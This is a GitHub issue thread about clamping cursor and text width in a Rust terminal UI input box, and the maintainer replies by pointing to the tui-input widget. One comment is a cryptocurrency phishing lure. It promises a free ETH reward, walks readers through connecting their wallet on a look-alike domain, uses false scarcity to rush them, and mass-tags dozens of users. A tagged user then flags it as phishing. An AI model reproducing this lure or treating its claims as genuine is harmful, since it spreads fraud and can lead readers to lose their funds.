### ISSUE TITLE
input_box: how to clamp cursor and text?

### ISSUE THREAD

**Issue by ghost** [Yengas/rust-chat-server#1]
Hello,

I'm building an UI app in terminal, inspired by your work. And I've encountered a hard issue with text fields.

I can't clamp the text size or cursor position as the maximum width of the widget is known at render time.

I've noticed your work has the same issue.

How can one resolve this?

Ty for this repo.

**Comment by Yengas** [comment]
Hey @neotene,

There are some widgets mentioned in the ratatui documentation. You may want to check those out. For example; [sayanarijit/tui-input](https://github.com/sayanarijit/tui-input/tree/main) seems like a good candidate for what you are asking for. There is also another widget for textarea.

Closing the issue since I am not planning to fix UI issues with this project.

Best of luck with you project 🙏

**Comment by chugo-admin** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Jacevezh1, @IvanorAlves, @blockchainchad, @adshao, @Hellonihar123, @maximebonhomme, @Pranavvks, @bynil, @sparksun, @ndemir, @90tech, @01chika, @BrotherJie, @ArseniyXaoc, @dantech0xff, @LikemDzokoto, @stephend017, @liuxuanqi, @nhatanhit, @Ifeadewumi, @thepartisan101, @AMMAR-62, @lmscn, @frankfanslc, @darkqiank, @0xpachinko, @gregory92024, @ryzhakar, @Nipol, @kartik7120, @Grbmax, @mikeliuu, @BraedonJL, @minaminao, @Sudharshandasari, @369gtech, @vincenz5, @vieirajlt, @nas0s, @samgohel, @shaurya2904, @behram, @Ehteshamoddin, @reducm, @yichiehliu, @akiratetsuo, @hiejulia, @mchelitos, @hyp3r5pace, @spenciefy

**Comment by Ifeadewumi** [comment]
I didn't initiate this.

This is a phishing attempt.

Thank you.
